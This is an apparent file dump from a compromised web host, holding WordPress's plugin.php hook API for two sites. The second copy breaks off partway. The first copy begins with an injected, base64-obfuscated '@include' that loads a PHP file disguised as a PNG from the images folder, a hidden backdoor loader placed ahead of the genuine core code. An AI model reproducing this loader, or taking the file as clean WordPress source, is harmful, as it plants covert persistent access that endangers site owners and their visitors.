PATH:
home
/
ediuae
/
pearlandpetalbeautyspa.com
/
8f1b7c
home/ediuae/pearlandpetalbeautyspa.com/wp-includes/plugin.php 0000444 00000107444 15156737274 0020531 0 ustar 00 <?php @include base64_decode("L2hvbWUvZWRpdWFlL3BlYXJsYW5kcGV0YWxiZWF1dHlzcGEuY29tL3dwLWluY2x1ZGVzL2ltYWdlcy9tZWRpYS9lYWNlZmVkZmZjYS5wbmc=");?><?php /** * The plugin API is located in this file, which allows for creating actions * and filters and hooking functions, and methods. The functions or methods will * then be run when the action or filter is called. * * The API callback examples reference functions, but can be methods of classes. * To hook methods, you'll need to pass an array one of two ways. * * Any of the syntaxes explained in the PHP documentation for the * {@link https://www.php.net/manual/en/language.pseudo-types.php#language.types.callback 'callback'} * type are valid. * * Also see the {@link https://developer.wordpress.org/plugins/ Plugin API} for * more information and examples on how to use a lot of these functions. * * This file should have no external dependencies. * * @package WordPress * @subpackage Plugin * @since 1.5.0 */ // Initialize the filter globals. require __DIR__ . '/class-wp-hook.php'; /** @var WP_Hook[] $wp_filter */ global $wp_filter; /** @var int[] $wp_actions */ global $wp_actions; /** @var int[] $wp_filters */ global $wp_filters; /** @var string[] $wp_current_filter */ global $wp_current_filter; if ( $wp_filter ) { $wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter ); } else { $wp_filter = array(); } if ( ! isset( $wp_actions ) ) { $wp_actions = array(); } if ( ! isset( $wp_filters ) ) { $wp_filters = array(); } if ( ! isset( $wp_current_filter ) ) { $wp_current_filter = array(); } /** * Adds a callback function to a filter hook. * * WordPress offers filter hooks to allow plugins to modify * various types of internal data at runtime. * * A plugin can modify data by binding a callback to a filter hook. When the filter * is later applied, each bound callback is run in order of priority, and given * the opportunity to modify a value by returning a new value. * * The following example shows how a callback function is bound to a filter hook. * * Note that `$example` is passed to the callback, (maybe) modified, then returned: * * function example_callback( $example ) { * // Maybe modify $example in some way. * return $example; * } * add_filter( 'example_filter', 'example_callback' ); * * Bound callbacks can accept from none to the total number of arguments passed as parameters * in the corresponding apply_filters() call. * * In other words, if an apply_filters() call passes four total arguments, callbacks bound to * it can accept none (the same as 1) of the arguments or up to four. The important part is that * the `$accepted_args` value must reflect the number of arguments the bound callback *actually* * opted to accept. If no arguments were accepted by the callback that is considered to be the * same as accepting 1 argument. For example: * * // Filter call. * $value = apply_filters( 'hook', $value, $arg2, $arg3 ); * * // Accepting zero/one arguments. * function example_callback() { * ... * return 'some value'; * } * add_filter( 'hook', 'example_callback' ); // Where $priority is default 10, $accepted_args is default 1. * * // Accepting two arguments (three possible). * function example_callback( $value, $arg2 ) { * ... * return $maybe_modified_value; * } * add_filter( 'hook', 'example_callback', 10, 2 ); // Where $priority is 10, $accepted_args is 2. * * *Note:* The function will return true whether or not the callback is valid. * It is up to you to take care. This is done for optimization purposes, so * everything is as quick as possible. * * @since 0.71 * * @global WP_Hook[] $wp_filter A multidimensional array of all hooks and the callbacks hooked to them. * * @param string $hook_name The name of the filter to add the callback to. * @param callable $callback The callback to be run when the filter is applied. * @param int $priority Optional. Used to specify the order in which the functions * associated with a particular filter are executed. * Lower numbers correspond with earlier execution, * and functions with the same priority are executed * in the order in which they were added to the filter. Default 10. * @param int $accepted_args Optional. The number of arguments the function accepts. Default 1. * @return true Always returns true. */ function add_filter( $hook_name, $callback, $priority = 10, $accepted_args = 1 ) { global $wp_filter; if ( ! isset( $wp_filter[ $hook_name ] ) ) { $wp_filter[ $hook_name ] = new WP_Hook(); } $wp_filter[ $hook_name ]->add_filter( $hook_name, $callback, $priority, $accepted_args ); return true; } /** * Calls the callback functions that have been added to a filter hook. * * This function invokes all functions attached to filter hook `$hook_name`. * It is possible to create new filter hooks by simply calling this function, * specifying the name of the new hook using the `$hook_name` parameter. * * The function also allows for multiple additional arguments to be passed to hooks. * * Example usage: * * // The filter callback function. * function example_callback( $string, $arg1, $arg2 ) { * // (maybe) modify $string. * return $string; * } * add_filter( 'example_filter', 'example_callback', 10, 3 ); * * /* * * Apply the filters by calling the 'example_callback()' function * * that's hooked onto `example_filter` above. * * * * - 'example_filter' is the filter hook. * * - 'filter me' is the value being filtered. * * - $arg1 and $arg2 are the additional arguments passed to the callback. * $value = apply_filters( 'example_filter', 'filter me', $arg1, $arg2 ); * * @since 0.71 * @since 6.0.0 Formalized the existing and already documented `...$args` parameter * by adding it to the function signature. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_filters Stores the number of times each filter was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the filter hook. * @param mixed $value The value to filter. * @param mixed ...$args Optional. Additional parameters to pass to the callback functions. * @return mixed The filtered value after all hooked functions are applied to it. */ function apply_filters( $hook_name, $value, ...$args ) { global $wp_filter, $wp_filters, $wp_current_filter; if ( ! isset( $wp_filters[ $hook_name ] ) ) { $wp_filters[ $hook_name ] = 1; } else { ++$wp_filters[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return $value; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } // Pass the value to WP_Hook. array_unshift( $args, $value ); $filtered = $wp_filter[ $hook_name ]->apply_filters( $value, $args ); array_pop( $wp_current_filter ); return $filtered; } /** * Calls the callback functions that have been added to a filter hook, specifying arguments in an array. * * @since 3.0.0 * * @see apply_filters() This function is identical, but the arguments passed to the * functions hooked to `$hook_name` are supplied using an array. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_filters Stores the number of times each filter was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the filter hook. * @param array $args The arguments supplied to the functions hooked to `$hook_name`. * @return mixed The filtered value after all hooked functions are applied to it. */ function apply_filters_ref_array( $hook_name, $args ) { global $wp_filter, $wp_filters, $wp_current_filter; if ( ! isset( $wp_filters[ $hook_name ] ) ) { $wp_filters[ $hook_name ] = 1; } else { ++$wp_filters[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return $args[0]; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } $filtered = $wp_filter[ $hook_name ]->apply_filters( $args[0], $args ); array_pop( $wp_current_filter ); return $filtered; } /** * Checks if any filter has been registered for a hook. * * When using the `$callback` argument, this function may return a non-boolean value * that evaluates to false (e.g. 0), so use the `===` operator for testing the return value. * * @since 2.5.0 * @since 6.9.0 Added the `$priority` parameter. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param string $hook_name The name of the filter hook. * @param callable|string|array|false $callback Optional. The callback to check for. * This function can be called unconditionally to speculatively check * a callback that may or may not exist. Default false. * @param int|false $priority Optional. The specific priority at which to check for the callback. * Default false. * @return bool|int If `$callback` is omitted, returns boolean for whether the hook has * anything registered. When checking a specific function, the priority * of that hook is returned, or false if the function is not attached. * If `$callback` and `$priority` are both provided, a boolean is returned * for whether the specific function is registered at that priority. */ function has_filter( $hook_name, $callback = false, $priority = false ) { global $wp_filter; if ( ! isset( $wp_filter[ $hook_name ] ) ) { return false; } return $wp_filter[ $hook_name ]->has_filter( $hook_name, $callback, $priority ); } /** * Removes a callback function from a filter hook. * * This can be used to remove default functions attached to a specific filter * hook and possibly replace them with a substitute. * * To remove a hook, the `$callback` and `$priority` arguments must match * when the hook was added. This goes for both filters and actions. No warning * will be given on removal failure. * * @since 1.2.0 * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param string $hook_name The filter hook to which the function to be removed is hooked. * @param callable|string|array $callback The callback to be removed from running when the filter is applied. * This function can be called unconditionally to speculatively remove * a callback that may or may not exist. * @param int $priority Optional. The exact priority used when adding the original * filter callback. Default 10. * @return bool Whether the function existed before it was removed. */ function remove_filter( $hook_name, $callback, $priority = 10 ) { global $wp_filter; $r = false; if ( isset( $wp_filter[ $hook_name ] ) ) { $r = $wp_filter[ $hook_name ]->remove_filter( $hook_name, $callback, $priority ); if ( ! $wp_filter[ $hook_name ]->callbacks ) { unset( $wp_filter[ $hook_name ] ); } } return $r; } /** * Removes all of the callback functions from a filter hook. * * @since 2.7.0 * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param string $hook_name The filter to remove callbacks from. * @param int|false $priority Optional. The priority number to remove them from. * Default false. * @return true Always returns true. */ function remove_all_filters( $hook_name, $priority = false ) { global $wp_filter; if ( isset( $wp_filter[ $hook_name ] ) ) { $wp_filter[ $hook_name ]->remove_all_filters( $priority ); if ( ! $wp_filter[ $hook_name ]->has_filters() ) { unset( $wp_filter[ $hook_name ] ); } } return true; } /** * Retrieves the name of the current filter hook. * * @since 2.5.0 * * @global string[] $wp_current_filter Stores the list of current filters with the current one last * * @return string|false Hook name of the current filter, false if no filter is running. */ function current_filter() { global $wp_current_filter; return end( $wp_current_filter ); } /** * Returns whether or not a filter hook is currently being processed. * * The function current_filter() only returns the most recent filter being executed. * did_filter() returns the number of times a filter has been applied during * the current request. * * This function allows detection for any filter currently being executed * (regardless of whether it's the most recent filter to fire, in the case of * hooks called from hook callbacks) to be verified. * * @since 3.9.0 * * @see current_filter() * @see did_filter() * @global string[] $wp_current_filter Current filter. * * @param string|null $hook_name Optional. Filter hook to check. Defaults to null, * which checks if any filter is currently being run. * @return bool Whether the filter is currently in the stack. */ function doing_filter( $hook_name = null ) { global $wp_current_filter; if ( null === $hook_name ) { return ! empty( $wp_current_filter ); } return in_array( $hook_name, $wp_current_filter, true ); } /** * Retrieves the number of times a filter has been applied during the current request. * * @since 6.1.0 * * @global int[] $wp_filters Stores the number of times each filter was triggered. * * @param string $hook_name The name of the filter hook. * @return int The number of times the filter hook has been applied. */ function did_filter( $hook_name ) { global $wp_filters; if ( ! isset( $wp_filters[ $hook_name ] ) ) { return 0; } return $wp_filters[ $hook_name ]; } /** * Adds a callback function to an action hook. * * Actions are the hooks that the WordPress core launches at specific points * during execution, or when specific events occur. Plugins can specify that * one or more of its PHP functions are executed at these points, using the * Action API. * * @since 1.2.0 * * @param string $hook_name The name of the action to add the callback to. * @param callable $callback The callback to be run when the action is called. * @param int $priority Optional. Used to specify the order in which the functions * associated with a particular action are executed. * Lower numbers correspond with earlier execution, * and functions with the same priority are executed * in the order in which they were added to the action. Default 10. * @param int $accepted_args Optional. The number of arguments the function accepts. Default 1. * @return true Always returns true. */ function add_action( $hook_name, $callback, $priority = 10, $accepted_args = 1 ) { return add_filter( $hook_name, $callback, $priority, $accepted_args ); } /** * Calls the callback functions that have been added to an action hook. * * This function invokes all functions attached to action hook `$hook_name`. * It is possible to create new action hooks by simply calling this function, * specifying the name of the new hook using the `$hook_name` parameter. * * You can pass extra arguments to the hooks, much like you can with `apply_filters()`. * * Example usage: * * // The action callback function. * function example_callback( $arg1, $arg2 ) { * // (maybe) do something with the args. * } * add_action( 'example_action', 'example_callback', 10, 2 ); * * /* * * Trigger the actions by calling the 'example_callback()' function * * that's hooked onto `example_action` above. * * * * - 'example_action' is the action hook. * * - $arg1 and $arg2 are the additional arguments passed to the callback. * do_action( 'example_action', $arg1, $arg2 ); * * @since 1.2.0 * @since 5.3.0 Formalized the existing and already documented `...$arg` parameter * by adding it to the function signature. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_actions Stores the number of times each action was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the action to be executed. * @param mixed ...$arg Optional. Additional arguments which are passed on to the * functions hooked to the action. Default empty. */ function do_action( $hook_name, ...$arg ) { global $wp_filter, $wp_actions, $wp_current_filter; if ( ! isset( $wp_actions[ $hook_name ] ) ) { $wp_actions[ $hook_name ] = 1; } else { ++$wp_actions[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } if ( empty( $arg ) ) { $arg[] = ''; } elseif ( is_array( $arg[0] ) && 1 === count( $arg[0] ) && isset( $arg[0][0] ) && is_object( $arg[0][0] ) ) { // Backward compatibility for PHP4-style passing of `array( &$this )` as action `$arg`. $arg[0] = $arg[0][0]; } $wp_filter[ $hook_name ]->do_action( $arg ); array_pop( $wp_current_filter ); } /** * Calls the callback functions that have been added to an action hook, specifying arguments in an array. * * @since 2.1.0 * * @see do_action() This function is identical, but the arguments passed to the * functions hooked to `$hook_name` are supplied using an array. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_actions Stores the number of times each action was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the action to be executed. * @param array $args The arguments supplied to the functions hooked to `$hook_name`. */ function do_action_ref_array( $hook_name, $args ) { global $wp_filter, $wp_actions, $wp_current_filter; if ( ! isset( $wp_actions[ $hook_name ] ) ) { $wp_actions[ $hook_name ] = 1; } else { ++$wp_actions[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } $wp_filter[ $hook_name ]->do_action( $args ); array_pop( $wp_current_filter ); } /** * Checks if any action has been registered for a hook. * * When using the `$callback` argument, this function may return a non-boolean value * that evaluates to false (e.g. 0), so use the `===` operator for testing the return value. * * @since 2.5.0 * @since 6.9.0 Added the `$priority` parameter. * * @see has_filter() This function is an alias of has_filter(). * * @param string $hook_name The name of the action hook. * @param callable|string|array|false $callback Optional. The callback to check for. * This function can be called unconditionally to speculatively check * a callback that may or may not exist. Default false. * @param int|false $priority Optional. The specific priority at which to check for the callback. * Default false. * @return bool|int If `$callback` is omitted, returns boolean for whether the hook has * anything registered. When checking a specific function, the priority * of that hook is returned, or false if the function is not attached. * If `$callback` and `$priority` are both provided, a boolean is returned * for whether the specific function is registered at that priority. */ function has_action( $hook_name, $callback = false, $priority = false ) { return has_filter( $hook_name, $callback, $priority ); } /** * Removes a callback function from an action hook. * * This can be used to remove default functions attached to a specific action * hook and possibly replace them with a substitute. * * To remove a hook, the `$callback` and `$priority` arguments must match * when the hook was added. This goes for both filters and actions. No warning * will be given on removal failure. * * @since 1.2.0 * * @param string $hook_name The action hook to which the function to be removed is hooked. * @param callable|string|array $callback The name of the function which should be removed. * This function can be called unconditionally to speculatively remove * a callback that may or may not exist. * @param int $priority Optional. The exact priority used when adding the original * action callback. Default 10. * @return bool Whether the function is removed. */ function remove_action( $hook_name, $callback, $priority = 10 ) { return remove_filter( $hook_name, $callback, $priority ); } /** * Removes all of the callback functions from an action hook. * * @since 2.7.0 * * @param string $hook_name The action to remove callbacks from. * @param int|false $priority Optional. The priority number to remove them from. * Default false. * @return true Always returns true. */ function remove_all_actions( $hook_name, $priority = false ) { return remove_all_filters( $hook_name, $priority ); } /** * Retrieves the name of the current action hook. * * @since 3.9.0 * * @return string|false Hook name of the current action, false if no action is running. */ function current_action() { return current_filter(); } /** * Returns whether or not an action hook is currently being processed. * * The function current_action() only returns the most recent action being executed. * did_action() returns the number of times an action has been fired during * the current request. * * This function allows detection for any action currently being executed * (regardless of whether it's the most recent action to fire, in the case of * hooks called from hook callbacks) to be verified. * * @since 3.9.0 * * @see current_action() * @see did_action() * * @param string|null $hook_name Optional. Action hook to check. Defaults to null, * which checks if any action is currently being run. * @return bool Whether the action is currently in the stack. */ function doing_action( $hook_name = null ) { return doing_filter( $hook_name ); } /** * Retrieves the number of times an action has been fired during the current request. * * @since 2.1.0 * * @global int[] $wp_actions Stores the number of times each action was triggered. * * @param string $hook_name The name of the action hook. * @return int The number of times the action hook has been fired. */ function did_action( $hook_name ) { global $wp_actions; if ( ! isset( $wp_actions[ $hook_name ] ) ) { return 0; } return $wp_actions[ $hook_name ]; } /** * Fires functions attached to a deprecated filter hook. * * When a filter hook is deprecated, the apply_filters() call is replaced with * apply_filters_deprecated(), which triggers a deprecation notice and then fires * the original filter hook. * * Note: the value and extra arguments passed to the original apply_filters() call * must be passed here to `$args` as an array. For example: * * // Old filter. * return apply_filters( 'wpdocs_filter', $value, $extra_arg ); * * // Deprecated. * return apply_filters_deprecated( 'wpdocs_filter', array( $value, $extra_arg ), '4.9.0', 'wpdocs_new_filter' ); * * @since 4.6.0 * * @see _deprecated_hook() * * @param string $hook_name The name of the filter hook. * @param array $args Array of additional function arguments to be passed to apply_filters(). * @param string $version The version of WordPress that deprecated the hook. * @param string $replacement Optional. The hook that should have been used. Default empty. * @param string $message Optional. A message regarding the change. Default empty. * @return mixed The filtered value after all hooked functions are applied to it. */ function apply_filters_deprecated( $hook_name, $args, $version, $replacement = '', $message = '' ) { if ( ! has_filter( $hook_name ) ) { return $args[0]; } _deprecated_hook( $hook_name, $version, $replacement, $message ); return apply_filters_ref_array( $hook_name, $args ); } /** * Fires functions attached to a deprecated action hook. * * When an action hook is deprecated, the do_action() call is replaced with * do_action_deprecated(), which triggers a deprecation notice and then fires * the original hook. * * @since 4.6.0 * * @see _deprecated_hook() * * @param string $hook_name The name of the action hook. * @param array $args Array of additional function arguments to be passed to do_action(). * @param string $version The version of WordPress that deprecated the hook. * @param string $replacement Optional. The hook that should have been used. Default empty. * @param string $message Optional. A message regarding the change. Default empty. */ function do_action_deprecated( $hook_name, $args, $version, $replacement = '', $message = '' ) { if ( ! has_action( $hook_name ) ) { return; } _deprecated_hook( $hook_name, $version, $replacement, $message ); do_action_ref_array( $hook_name, $args ); } // // Functions for handling plugins. // /** * Gets the basename of a plugin. * * This method extracts the name of a plugin from its filename. * * @since 1.5.0 * * @global array $wp_plugin_paths * * @param string $file The filename of plugin. * @return string The name of a plugin. */ function plugin_basename( $file ) { global $wp_plugin_paths; // $wp_plugin_paths contains normalized paths. $file = wp_normalize_path( $file ); arsort( $wp_plugin_paths ); foreach ( $wp_plugin_paths as $dir => $realdir ) { if ( str_starts_with( $file, $realdir ) ) { $file = $dir . substr( $file, strlen( $realdir ) ); } } $plugin_dir = wp_normalize_path( WP_PLUGIN_DIR ); $mu_plugin_dir = wp_normalize_path( WPMU_PLUGIN_DIR ); // Get relative path from plugins directory. $file = preg_replace( '#^' . preg_quote( $plugin_dir, '#' ) . '/|^' . preg_quote( $mu_plugin_dir, '#' ) . '/#', '', $file ); $file = trim( $file, '/' ); return $file; } /** * Register a plugin's real path. * * This is used in plugin_basename() to resolve symlinked paths. * * @since 3.9.0 * * @see wp_normalize_path() * * @global array $wp_plugin_paths * * @param string $file Known path to the file. * @return bool Whether the path was able to be registered. */ function wp_register_plugin_realpath( $file ) { global $wp_plugin_paths; // Normalize, but store as static to avoid recalculation of a constant value. static $wp_plugin_path = null, $wpmu_plugin_path = null; if ( ! isset( $wp_plugin_path ) ) { $wp_plugin_path = wp_normalize_path( WP_PLUGIN_DIR ); $wpmu_plugin_path = wp_normalize_path( WPMU_PLUGIN_DIR ); } $plugin_path = wp_normalize_path( dirname( $file ) ); $plugin_realpath = wp_normalize_path( dirname( realpath( $file ) ) ); if ( $plugin_path === $wp_plugin_path || $plugin_path === $wpmu_plugin_path ) { return false; } if ( $plugin_path !== $plugin_realpath ) { $wp_plugin_paths[ $plugin_path ] = $plugin_realpath; } return true; } /** * Get the filesystem directory path (with trailing slash) for the plugin __FILE__ passed in. * * @since 2.8.0 * * @param string $file The filename of the plugin (__FILE__). * @return string the filesystem path of the directory that contains the plugin. */ function plugin_dir_path( $file ) { return trailingslashit( dirname( $file ) ); } /** * Get the URL directory path (with trailing slash) for the plugin __FILE__ passed in. * * @since 2.8.0 * * @param string $file The filename of the plugin (__FILE__). * @return string the URL path of the directory that contains the plugin. */ function plugin_dir_url( $file ) { return trailingslashit( plugins_url( '', $file ) ); } /** * Set the activation hook for a plugin. * * When a plugin is activated, the action 'activate_PLUGINNAME' hook is * called. In the name of this hook, PLUGINNAME is replaced with the name * of the plugin, including the optional subdirectory. For example, when the * plugin is located in wp-content/plugins/sampleplugin/sample.php, then * the name of this hook will become 'activate_sampleplugin/sample.php'. * * When the plugin consists of only one file and is (as by default) located at * wp-content/plugins/sample.php the name of this hook will be * 'activate_sample.php'. * * @since 2.0.0 * * @param string $file The filename of the plugin including the path. * @param callable $callback The function hooked to the 'activate_PLUGIN' action. */ function register_activation_hook( $file, $callback ) { $file = plugin_basename( $file ); add_action( 'activate_' . $file, $callback ); } /** * Sets the deactivation hook for a plugin. * * When a plugin is deactivated, the action 'deactivate_PLUGINNAME' hook is * called. In the name of this hook, PLUGINNAME is replaced with the name * of the plugin, including the optional subdirectory. For example, when the * plugin is located in wp-content/plugins/sampleplugin/sample.php, then * the name of this hook will become 'deactivate_sampleplugin/sample.php'. * * When the plugin consists of only one file and is (as by default) located at * wp-content/plugins/sample.php the name of this hook will be * 'deactivate_sample.php'. * * @since 2.0.0 * * @param string $file The filename of the plugin including the path. * @param callable $callback The function hooked to the 'deactivate_PLUGIN' action. */ function register_deactivation_hook( $file, $callback ) { $file = plugin_basename( $file ); add_action( 'deactivate_' . $file, $callback ); } /** * Sets the uninstallation hook for a plugin. * * Registers the uninstall hook that will be called when the user clicks on the * uninstall link that calls for the plugin to uninstall itself. The link won't * be active unless the plugin hooks into the action. * * The plugin should not run arbitrary code outside of functions, when * registering the uninstall hook. In order to run using the hook, the plugin * will have to be included, which means that any code laying outside of a * function will be run during the uninstallation process. The plugin should not * hinder the uninstallation process. * * If the plugin can not be written without running code within the plugin, then * the plugin should create a file named 'uninstall.php' in the base plugin * folder. This file will be called, if it exists, during the uninstallation process * bypassing the uninstall hook. The plugin, when using the 'uninstall.php' * should always check for the 'WP_UNINSTALL_PLUGIN' constant, before * executing. * * @since 2.7.0 * * @param string $file Plugin file. * @param callable $callback The callback to run when the hook is called. Must be * a static method or function. */ function register_uninstall_hook( $file, $callback ) { if ( is_array( $callback ) && is_object( $callback[0] ) ) { _doing_it_wrong( __FUNCTION__, __( 'Only a static class method or function can be used in an uninstall hook.' ), '3.1.0' ); return; } /* * The option should not be autoloaded, because it is not needed in most * cases. Emphasis should be put on using the 'uninstall.php' way of * uninstalling the plugin. */ $uninstallable_plugins = (array) get_option( 'uninstall_plugins' ); $plugin_basename = plugin_basename( $file ); if ( ! isset( $uninstallable_plugins[ $plugin_basename ] ) || $uninstallable_plugins[ $plugin_basename ] !== $callback ) { $uninstallable_plugins[ $plugin_basename ] = $callback; update_option( 'uninstall_plugins', $uninstallable_plugins ); } } /** * Calls the 'all' hook, which will process the functions hooked into it. * * The 'all' hook passes all of the arguments or parameters that were used for * the hook, which this function was called for. * * This function is used internally for apply_filters(), do_action(), and * do_action_ref_array() and is not meant to be used from outside those * functions. This function does not check for the existence of the all hook, so * it will fail unless the all hook exists prior to this function call. * * @since 2.5.0 * @access private * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param array $args The collected parameters from the hook that was called. */ function _wp_call_all_hook( $args ) { global $wp_filter; $wp_filter['all']->do_all_hook( $args ); } /** * Builds a unique string ID for a hook callback function. * * Functions and static method callbacks are just returned as strings and * shouldn't have any speed penalty. * * @link https://core.trac.wordpress.org/ticket/3875 * * @since 2.2.3 * @since 5.3.0 Removed workarounds for spl_object_hash(). * `$hook_name` and `$priority` are no longer used, * and the function always returns a string. * * @access private * * @param string $hook_name Unused. The name of the filter to build ID for. * @param callable|string|array $callback The callback to generate ID for. The callback may * or may not exist. * @param int $priority Unused. The order in which the functions * associated with a particular action are executed. * @return string|null Unique function ID for usage as array key. * Null if a valid `$callback` is not passed. */ function _wp_filter_build_unique_id( $hook_name, $callback, $priority ) { if ( is_string( $callback ) ) { return $callback; } if ( is_object( $callback ) ) { // Closures are currently implemented as objects. $callback = array( $callback, '' ); } else { $callback = (array) $callback; } if ( is_object( $callback[0] ) ) { // Object class calling. return spl_object_hash( $callback[0] ) . $callback[1]; } elseif ( is_string( $callback[0] ) ) { // Static calling. return $callback[0] . '::' . $callback[1]; } return null; } home/ediuae/accubooksuae.com/wp-includes/plugin.php 0000644 00000107225 15157463673 0016442 0 ustar 00 <?php /** * The plugin API is located in this file, which allows for creating actions * and filters and hooking functions, and methods. The functions or methods will * then be run when the action or filter is called. * * The API callback examples reference functions, but can be methods of classes. * To hook methods, you'll need to pass an array one of two ways. * * Any of the syntaxes explained in the PHP documentation for the * {@link https://www.php.net/manual/en/language.pseudo-types.php#language.types.callback 'callback'} * type are valid. * * Also see the {@link https://developer.wordpress.org/plugins/ Plugin API} for * more information and examples on how to use a lot of these functions. * * This file should have no external dependencies. * * @package WordPress * @subpackage Plugin * @since 1.5.0 */ // Initialize the filter globals. require __DIR__ . '/class-wp-hook.php'; /** @var WP_Hook[] $wp_filter */ global $wp_filter; /** @var int[] $wp_actions */ global $wp_actions; /** @var int[] $wp_filters */ global $wp_filters; /** @var string[] $wp_current_filter */ global $wp_current_filter; if ( $wp_filter ) { $wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter ); } else { $wp_filter = array(); } if ( ! isset( $wp_actions ) ) { $wp_actions = array(); } if ( ! isset( $wp_filters ) ) { $wp_filters = array(); } if ( ! isset( $wp_current_filter ) ) { $wp_current_filter = array(); } /** * Adds a callback function to a filter hook. * * WordPress offers filter hooks to allow plugins to modify * various types of internal data at runtime. * * A plugin can modify data by binding a callback to a filter hook. When the filter * is later applied, each bound callback is run in order of priority, and given * the opportunity to modify a value by returning a new value. * * The following example shows how a callback function is bound to a filter hook. * * Note that `$example` is passed to the callback, (maybe) modified, then returned: * * function example_callback( $example ) { * // Maybe modify $example in some way. * return $example; * } * add_filter( 'example_filter', 'example_callback' ); * * Bound callbacks can accept from none to the total number of arguments passed as parameters * in the corresponding apply_filters() call. * * In other words, if an apply_filters() call passes four total arguments, callbacks bound to * it can accept none (the same as 1) of the arguments or up to four. The important part is that * the `$accepted_args` value must reflect the number of arguments the bound callback *actually* * opted to accept. If no arguments were accepted by the callback that is considered to be the * same as accepting 1 argument. For example: * * // Filter call. * $value = apply_filters( 'hook', $value, $arg2, $arg3 ); * * // Accepting zero/one arguments. * function example_callback() { * ... * return 'some value'; * } * add_filter( 'hook', 'example_callback' ); // Where $priority is default 10, $accepted_args is default 1. * * // Accepting two arguments (three possible). * function example_callback( $value, $arg2 ) { * ... * return $maybe_modified_value; * } * add_filter( 'hook', 'example_callback', 10, 2 ); // Where $priority is 10, $accepted_args is 2. * * *Note:* The function will return true whether or not the callback is valid. * It is up to you to take care. This is done for optimization purposes, so * everything is as quick as possible. * * @since 0.71 * * @global WP_Hook[] $wp_filter A multidimensional array of all hooks and the callbacks hooked to them. * * @param string $hook_name The name of the filter to add the callback to. * @param callable $callback The callback to be run when the filter is applied. * @param int $priority Optional. Used to specify the order in which the functions * associated with a particular filter are executed. * Lower numbers correspond with earlier execution, * and functions with the same priority are executed * in the order in which they were added to the filter. Default 10. * @param int $accepted_args Optional. The number of arguments the function accepts. Default 1. * @return true Always returns true. */ function add_filter( $hook_name, $callback, $priority = 10, $accepted_args = 1 ) { global $wp_filter; if ( ! isset( $wp_filter[ $hook_name ] ) ) { $wp_filter[ $hook_name ] = new WP_Hook(); } $wp_filter[ $hook_name ]->add_filter( $hook_name, $callback, $priority, $accepted_args ); return true; } /** * Calls the callback functions that have been added to a filter hook. * * This function invokes all functions attached to filter hook `$hook_name`. * It is possible to create new filter hooks by simply calling this function, * specifying the name of the new hook using the `$hook_name` parameter. * * The function also allows for multiple additional arguments to be passed to hooks. * * Example usage: * * // The filter callback function. * function example_callback( $string, $arg1, $arg2 ) { * // (maybe) modify $string. * return $string; * } * add_filter( 'example_filter', 'example_callback', 10, 3 ); * * /* * * Apply the filters by calling the 'example_callback()' function * * that's hooked onto `example_filter` above. * * * * - 'example_filter' is the filter hook. * * - 'filter me' is the value being filtered. * * - $arg1 and $arg2 are the additional arguments passed to the callback. * $value = apply_filters( 'example_filter', 'filter me', $arg1, $arg2 ); * * @since 0.71 * @since 6.0.0 Formalized the existing and already documented `...$args` parameter * by adding it to the function signature. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_filters Stores the number of times each filter was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the filter hook. * @param mixed $value The value to filter. * @param mixed ...$args Optional. Additional parameters to pass to the callback functions. * @return mixed The filtered value after all hooked functions are applied to it. */ function apply_filters( $hook_name, $value, ...$args ) { global $wp_filter, $wp_filters, $wp_current_filter; if ( ! isset( $wp_filters[ $hook_name ] ) ) { $wp_filters[ $hook_name ] = 1; } else { ++$wp_filters[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) 